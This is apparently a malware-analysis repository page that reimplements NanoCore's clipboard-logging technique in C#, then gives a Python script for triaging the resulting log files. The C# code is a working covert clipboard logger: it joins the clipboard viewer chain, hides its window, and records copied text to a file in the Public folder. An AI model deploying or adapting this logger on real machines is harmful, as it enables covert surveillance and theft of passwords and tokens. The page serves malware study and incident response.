MalwareAnalysisSeries

This repository contains analysis reports, technical details and tools created to help with malware analysis. It also contains TTPs extracted from the analysed samples, reimplemented as code, along with detection rules for them.


Project maintained by shaddy43

NanoCore 1.2.2.0: Clipboard Logging

RAT Image

This is a clipboard logger TTP extracted from NanoCore 1.2.2.0. The malware registers a clipboard viewer with the SetClipboardViewer Win32 API, receives clipboard change notifications through the window procedure (WndProc), and appends the stolen clipboard data to a log file created in the Public folder.

Implementation

Required APIs

NanoCore uses three exports from user32.dll: SetClipboardViewer to join the clipboard viewer chain and start receiving clipboard notifications, SendMessage to forward those notifications to the next viewer in the chain, and ChangeClipboardChain, which removes a window from the chain again.

// Joins the calling window to the clipboard viewer chain and returns the previous head of the chain.
[DllImport("user32.dll")]
private static extern IntPtr SetClipboardViewer(IntPtr hWndNewViewer);

// Removes a window from the chain (imported by NanoCore; not used in the excerpt shown here).
[DllImport("user32.dll")]
private static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);

// Passes clipboard-chain messages on to the next viewer. SendMessage returns an LRESULT,
// so IntPtr is the correct marshalling type for the return value.
[DllImport("user32.dll")]
private static extern IntPtr SendMessage(IntPtr hWnd, int msg, IntPtr wParam, IntPtr lParam);

Establish a log file

The first thing the NanoCore client binary does is create a log file in the Public folder; all stolen clipboard data is recorded there until it is exfiltrated.

// clipboard_logger_path initially holds the Public folder (its declaration is not shown here).
// The log is named KB_<Environment.TickCount>.dat, so the file name records the
// milliseconds since boot at the moment the logger started.
private static void setup()
{
    clipboard_logger_path = Path.Combine(clipboard_logger_path, Path.ChangeExtension("KB_" + Conversions.ToString(Environment.TickCount), "dat"));
}

Setup clipboard viewer

NanoCore uses a hidden Windows Forms application instead of the traditional APIs used to record keystrokes and clipboard data. A form is easy to register for raw input (for keylogging) and to register as a clipboard viewer (for clipboard logging): passing the handle of the current form to SetClipboardViewer makes the form part of the clipboard viewer chain, so it receives and forwards every clipboard notification.

Because a form is visible to the user, NanoCore hides itself by minimizing the form and then forcing its visibility to false.

// Handle of the next viewer in the chain (the head of the chain before this form joined it).
private IntPtr _nextClipboardViewer = IntPtr.Zero;

public ClipboardViewerForm()
{
    Console.WriteLine("Starting clipboard logger...");
    setup();
    // Register this form as a clipboard viewer and remember the previous head of the chain
    // so that clipboard-chain messages can be forwarded to it.
    _nextClipboardViewer = SetClipboardViewer(this.Handle);

    Console.WriteLine("Hiding logger");
    this.WindowState = FormWindowState.Minimized; // the form is minimized to hide the logger
    this.VisibleChanged += ClipboardViewerForm_VisibleChanged; // whenever the form would become visible, it is hidden again
}

private void ClipboardViewerForm_VisibleChanged(object sender, EventArgs e)
{
    this.Visible = false;
}

Receive Clipboard Data

Once the form is registered as a clipboard viewer, it receives clipboard notifications through WndProc, the window procedure that processes every message sent to the form's window. Our hidden form, running in the background, therefore receives a WM_DRAWCLIPBOARD message whenever the clipboard changes; all it has to do is handle the clipboard data and pass the message on to the next viewer in the chain.

// The window procedure that receives all clipboard-chain messages is overridden to handle them.
protected override void WndProc(ref Message m)
{
    const int WM_DRAWCLIPBOARD = 0x308;
    const int WM_CHANGECBCHAIN = 0x30D;

    switch (m.Msg)
    {
        case WM_DRAWCLIPBOARD:
            // Clipboard contents have changed: log them, then pass the notification
            // along so the rest of the viewer chain keeps receiving it.
            HandleClipboardChange();
            if (_nextClipboardViewer != IntPtr.Zero)
            {
                SendMessage(_nextClipboardViewer, m.Msg, m.WParam, m.LParam);
            }
            break;

        case WM_CHANGECBCHAIN:
            if (m.WParam == _nextClipboardViewer)
            {
                // The next clipboard viewer has been removed; lParam is its successor
                _nextClipboardViewer = m.LParam;
            }
            else if (_nextClipboardViewer != IntPtr.Zero)
            {
                // Pass the message to the next viewer in the chain
                SendMessage(_nextClipboardViewer, m.Msg, m.WParam, m.LParam);
            }
            break;

        default:
            base.WndProc(ref m);
            break;
    }
}

In WndProc we only need to handle the received clipboard data: read it and append it to the log file established earlier.

private void HandleClipboardChange()
{
    Console.Write("Getting clipboard data...:");

    try
    {
        if (Clipboard.ContainsText())
        {
            string text = Clipboard.GetText();
            if (text.Length > 128000)
            {
                text = text.Substring(0, 128000); // keep only the first 128,000 characters
            }

            Log_clipboard(text);
        }
    }
    catch (Exception ex)
    {
        // Clipboard access can fail (for example when another process holds the clipboard open); skip this change.
        Console.WriteLine($"Error: {ex.Message}");
    }
}

private void Log_clipboard(string clipboard_text)
{
    // Append the copied text, prefixed with a timestamp, to the log file created in setup().
    // If clipboard_logger_path is absolute (the Public folder), Path.Combine returns it unchanged.
    File.AppendAllText(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, clipboard_logger_path), $"Copied data at {DateTime.Now}: " + clipboard_text + "\n");
}
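The log file established in setup() and the entry format written by Log_clipboard give an incident responder a concrete artifact to triage. The script below is an added example, not code from the NanoCore write-up or from the repository: it locates files in a directory named like the logger's output (KB_<TickCount>.dat), reassembles the "Copied data at <timestamp>: <text>" entries, including pastes that span several lines, and decodes the TickCount in the file name into the host's approximate uptime when logging began. The sample log it writes into a temporary directory is constructed for the demonstration; because DateTime.Now is formatted according to the victim's culture settings, the timestamp is kept verbatim rather than parsed.

```python
"""Triage helper for NanoCore-style clipboard logs.

Added example; not code from the write-up or the NanoCore sample. Assumptions
taken from the page: the log is named "KB_" + Environment.TickCount + ".dat",
and every entry starts with "Copied data at <DateTime.Now>: " followed by the
copied text, which may span several lines.
"""
import re
import tempfile
from dataclasses import dataclass, field
from datetime import timedelta
from pathlib import Path

# Environment.TickCount is a signed 32-bit value, so allow a leading minus sign.
ARTIFACT_NAME = re.compile(r"^KB_(-?\d+)\.dat$")
# Entry header: the timestamp runs up to the first ": " (a time such as
# "3:04:05 PM" contains colons, but never colon-space), then the copied text.
ENTRY_START = re.compile(r"^Copied data at (.*?): (.*)$")


@dataclass
class ClipboardEntry:
    timestamp: str  # DateTime.Now exactly as written; culture dependent, not parsed
    text: str       # copied text, line endings normalised to "\n"


@dataclass
class ArtifactReport:
    path: Path
    tick_count_ms: int
    entries: list = field(default_factory=list)

    @property
    def uptime_at_start(self) -> timedelta:
        """TickCount is milliseconds since boot and wraps after ~24.9 days, so the
        file name tells roughly how long the host had been up when logging began."""
        return timedelta(milliseconds=self.tick_count_ms & 0xFFFFFFFF)


def parse_log(content: str) -> list:
    """Rebuild entries from the log text.

    A line that does not start a new entry is a continuation of the previous
    clipboard payload. A pasted text that itself contains a line beginning with
    "Copied data at ...: " cannot be told apart from a real header; review such
    splits manually when an entry looks truncated.
    """
    entries = []
    current = None
    for line in content.splitlines():
        m = ENTRY_START.match(line)
        if m:
            current = ClipboardEntry(timestamp=m.group(1), text=m.group(2))
            entries.append(current)
        elif current is not None:
            current.text += "\n" + line
        # lines before the first header are noise and are skipped
    return entries


def find_artifacts(directory: Path) -> list:
    """Return a report for every file in `directory` named like the logger's output."""
    reports = []
    for path in sorted(directory.iterdir()):
        m = ARTIFACT_NAME.match(path.name)
        if m and path.is_file():
            report = ArtifactReport(path=path, tick_count_ms=int(m.group(1)))
            # File.AppendAllText writes UTF-8; utf-8-sig also tolerates a BOM.
            report.entries = parse_log(path.read_text(encoding="utf-8-sig"))
            reports.append(report)
    return reports


def demo() -> list:
    """Create a constructed stand-in for the Public folder and triage it."""
    workdir = Path(tempfile.mkdtemp(prefix="clipboard_triage_"))
    sample = (  # constructed log content, mirroring the Log_clipboard format
        "Copied data at 1/5/2024 3:04:05 PM: example-secret-token\n"
        "Copied data at 1/5/2024 3:04:09 PM: -----BEGIN EXAMPLE-----\n"
        "second line of a multi-line paste\n"
        "-----END EXAMPLE-----\n"
        "Copied data at 1/5/2024 3:05:00 PM: \n"
    )
    (workdir / "KB_123456789.dat").write_text(sample, encoding="utf-8")
    (workdir / "notes.txt").write_text("unrelated file", encoding="utf-8")
    return find_artifacts(workdir)


if __name__ == "__main__":
    for report in demo():
        print(f"{report.path.name}: {len(report.entries)} entries, "
              f"host uptime at start ~ {report.uptime_at_start}")
        for e in report.entries:
            print(f"  [{e.timestamp}] {e.text!r}")
```

Run it against a copy of the victim's Public folder instead of the temporary directory to list every logger artifact with its entries. The uptime derived from the file name can be compared with the host's boot time to place the start of clipboard logging on the incident timeline.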

This program only works as a Windows Forms application, because receiving clipboard data through SetClipboardViewer and WndProc requires a window. Hiding the form is straightforward: minimize it and set its visibility to false.

Find the complete code here: Shaddy43/MalwareAnalysisSeries

Disclaimer

Artifacts and code in this repository are intended to be used for educational purposes only!!!